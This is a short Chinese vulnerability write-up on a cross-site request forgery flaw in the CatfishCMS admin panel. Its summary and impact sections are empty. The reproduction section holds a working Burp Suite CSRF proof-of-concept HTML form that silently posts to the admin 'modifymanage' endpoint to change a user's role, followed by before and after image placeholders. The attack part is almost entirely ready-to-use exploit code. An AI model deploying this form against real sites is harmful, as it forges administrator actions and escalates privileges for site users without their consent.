

CatfishCMS后台csrf¶

一、漏洞简介¶

二、漏洞影响¶

三、复现过程¶

首先需要登录后台

&lt;html&gt;
  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;
  &lt;form action="http://0-sec.org/index.php/admin/index/modifymanage.html?c=73" method="POST"&gt;
      &lt;input type="hidden" name="uid" value="73" /&gt;
      &lt;input type="hidden" name="juese" value="3" /&gt;
      &lt;input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

修改前

修改后

image